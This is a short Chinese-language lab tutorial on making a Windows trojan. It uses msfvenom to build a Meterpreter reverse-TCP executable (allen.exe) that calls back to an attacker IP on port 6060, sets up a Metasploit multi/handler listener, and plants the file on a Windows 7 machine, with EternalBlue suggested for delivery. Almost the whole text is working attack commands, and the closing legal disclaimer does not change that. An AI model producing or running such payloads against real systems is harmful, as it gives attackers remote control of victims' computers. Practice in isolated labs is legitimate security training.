PC端恶意程序利用
制作WIndows恶意软件获取shell
msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品,是用来生成后门的软件
实验内容
制作Win恶意软件
msfvenom的shell在windows中的使用msfvenom生成shell.exe
前置命令 切换到root用户,确保权限最大
sudo passwd root
su root
步骤一:制作并且输出恶意软件
命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.163.129(攻击机的IP)
LPORT=6060 -f exe >allen.exe(名字自己取)
-p 添加载荷payload。
-f 输出文件格式
步骤2
启动msf
msfconsole
步骤3
metasploit设置侦听
use exploit/multi/handler #加载模块
msf exploit(multi/handler)> set payload windows/meterpreter/reverse_tcp
#设置payload
msf exploit(multi/handler) > set lhost kali的ip #设置kali的IP
msf exploit(multi/handler) > set lport 6060 #设置kali的端口lport =6060
msf exploit (multi/handler) > exploit 或者 run -j #执行
接着把木马文件上传到win7
可以用永恒之蓝漏洞上传到win7(步骤见day01)
命令:
upload allen.exe c://
点击win7的allen程序
ps 查看端口
可能问题
meterpreter died
原因攻击载荷不对
最后打开win7任务管理器查看allen.exe程序,已经存在了
注:本文内容仅为个人技术实验分享,请谨记国家安全法。